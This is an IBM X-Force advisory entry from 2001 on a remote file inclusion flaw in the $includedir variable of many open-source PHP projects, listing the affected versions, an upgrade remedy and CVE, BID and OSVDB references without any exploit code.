Multiple vendor open-source PHP projects could allow remote command execution

php-includedir-code-execution (7215) The risk level is classified as HighHigh Risk

Description:

Multiple open-source projects written in PHP could allow a remote attacker to execute arbitrary commands on the Web server, caused by a vulnerability in the way the $includedir variable handles user-supplied input. A remote attacker can send to the server a specially-crafted URL that passes arbitrary data using the $includedir variable to specify a malicious file containing PHP code to be executed on the host. An attacker can use this vulnerability to execute commands on the Web server with privileges on the webserver process.


Consequences:

Gain Privileges

Remedy:

For phpAdsNew 2.0 beta 5:
Upgrade to the latest version of phpAdsNew (2 dev 09102001 or later), available from the SourceForge Web site - Project: phpAdsNew. See References.

For other distributions:
Contact your vendor for patch or upgrade information.

References:

  • AWOL Web site: Project details for AWOL.
  • BugTraq Mailing List, Tue Oct 02 2001 - 16:59:09 CDT: results of semi-automatic source code audit.
  • CCCSoftware Web site: CCC.
  • Empris Web site: Empris.
  • more.groupware Web site: latest news.
  • myphpPagetool Web site: Welcome to myphpPagetool.
  • PeaceWorks Computer Consulting Web site: Phormation.
  • Phorecast Web site: What is Phorecast?.
  • pSlash Web site: pSlash Web Portal System.
  • SourceForge.net: Project: phpAdsNew.
  • SourceForge.net: Project: Gallery.
  • SourceForge.net: Project: ActionPoll.
  • SourceForge.net: Project: Dark Hart Portal.
  • SourceForge.net: Project: SIPS.
  • Webodex Web site: Webodex.
  • BID-3383: Marc Logemann More.groupware Remote Arbitrary Code Execution Vulnerability
  • BID-3384: Actionpoll Remote Arbitrary Code Execution Vulnerability
  • BID-3385: Grant Horwood Webodex Remote Arbitrary Code Execution Vulnerability
  • BID-3386: Zorbat ZorbStats Remote Arbitrary Code Execution Vulnerability
  • BID-3387: AWOL Remote Arbitrary Code Execution Vulnerability
  • BID-3388: Paul M. Jones Phorecast Remote Arbitrary Code Execution Vulnerability
  • BID-3389: CCC Remote Arbitrary Code Execution Vulnerability
  • BID-3390: Dark Hart Portal Remote Arbitrary Code Execution Vulnerability
  • BID-3391: Empris Remote Arbitrary Code Execution Vulnerability
  • BID-3392: PHPAdsNew Remote Arbitrary Code Execution Vulnerability
  • BID-3393: Peaceworks Computer Consulting Phormation Remote Arbitrary Code Execution Vulnerability
  • BID-3394: Sebastian Bunka myphpPagetool Arbitrary Code Execution Vulnerability
  • BID-3395: Derek Leung pSlash Remote Arbitrary Code Execution Vulnerability
  • BID-3396: Haakon Nilsen SIPS Remote Arbitrary Code Execution Vulnerability
  • BID-3397: Bharat Mediratta Gallery Remote Arbitrary Code Execution Vulnerability
  • CVE-2001-1048: AWOL PHP script allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
  • CVE-2001-1049: Phorecast PHP script before 0.40 allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
  • CVE-2001-1050: CCCSoftware CCC PHP script allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
  • CVE-2001-1051: Dark Hart Portal (darkportal) PHP script allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
  • CVE-2001-1052: Empris PHP script allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
  • CVE-2001-1054: PHPAdsNew PHP script allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
  • CVE-2001-1234: Bharat Mediratta Gallery PHP script before 1.2.1 allows remote attackers to execute arbitrary code by including files from remote web sites via an HTTP request that modifies the includedir variable.
  • CVE-2001-1235: pSlash PHP script 0.7 and earlier allows remote attackers to execute arbitrary code by including files from remote web sites, using an HTTP request that modifies the includedir variable.
  • CVE-2001-1236: myphpPagetool PHP script 0.4.3-1 and earlier allows remote attackers to execute arbitrary code by including files from remote web sites, using an HTTP request that modifies the includedir variable.
  • CVE-2001-1237: Phormation PHP script 0.9.1 and earlier allows remote attackers to execute arbitrary code by including files from remote web sites, using an HTTP request that modifies the phormationdir variable.
  • CVE-2001-1296: More.groupware PHP script allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
  • CVE-2001-1297: PHP remote file inclusion vulnerability in Actionpoll PHP script before 1.1.2 allows remote attackers to execute arbitrary PHP code via a URL in the includedir parameter.
  • CVE-2001-1298: Webodex PHP script 1.0 and earlier allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
  • CVE-2001-1299: Zorbat Zorbstats PHP script before 0.9 allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
  • OSVDB ID: 13058: Empris includedir Parameter Remote File Inclusion
  • OSVDB ID: 13059: CCCSoftware CCC includedir Remote File Inclusion
  • OSVDB ID: 13060: Dark Hart Portal darkportal includedir Remote File Inclusion
  • OSVDB ID: 13090: Webodex CGI Script Remote File Inclusion
  • OSVDB ID: 1959: AWOL helperfunction.php includedir Parameter Remote File Inclusion
  • OSVDB ID: 1960: Actionpoll includedir Remote File Inclusion
  • OSVDB ID: 1961: ZorbStats includedir Remote File Inclusion
  • OSVDB ID: 1962: Phorecast Arbitrary File Inclusion
  • OSVDB ID: 1963: phpAdsNew helperfunction.php Remote File Inclusion
  • OSVDB ID: 1964: Phormation phormationdir Arbitrary File Inclusion
  • OSVDB ID: 1965: myphpPagetool helperfunction.php includedir Parameter Remote File Inclusion
  • OSVDB ID: 1966: pSlash includedir Parameter Remote File Inclusion
  • OSVDB ID: 1967: Bharat Mediratta Gallery includedir Parameter Remote File Inclusion
  • OSVDB ID: 35356: ActionPoll actionpoll.php CONFIG_POLLDB Parameter Remote File Inclusion
  • OSVDB ID: 35357: ActionPoll db/DataReaderWriter.php CONFIG_DB Parameter Remote File Inclusion
  • OSVDB ID: 37417: ActionPoll db/PollDB.php CONFIG_DATAREADERWRITER Parameter Remote File Inclusion
  • OSVDB ID: 5433: More.groupware Remote File Inclusion
  • US-CERT VU#847803: Php variables passed from the browser are stored in global context

Platforms Affected:

  • CCCSoftware CCC 1.03 and prior
  • Chris DeRosia (topher1kenobe) AWOL 2.1 and prior
  • Dark Hart Design DarkPortal-unix 0.1.18 and prior
  • Empris Empris 0.4
  • Gallery Gallery 1.2.1
  • Grant Horwood Webodex 1.0
  • Haakon Nilsen Simple Internet Publishing System (SIPS) 0.3
  • more.groupware Development Team Moregroupware 0.5.1
  • Paul M. Jones Phorecast 0.30a
  • PeaceWorks Computer Consulting Phormation 0.9.1
  • pSlash pSlash 0.70
  • Sebastian Bunka myphpPagetool 0.4.3-1 and prior
  • Tobias Ratschiller phpAdsNew 2.0 beta 5
  • VCL Components Actionpoll 1.1.1
  • Zorbat Zorbstats 0.8

Reported:

Oct 02, 2001

The information within this database may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (IBM Internet Security Systems X-Force) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

For corrections or additions please email ignore thisxforceignore this@ignore thisus.ignore thisibm.comignore this

Return to the main page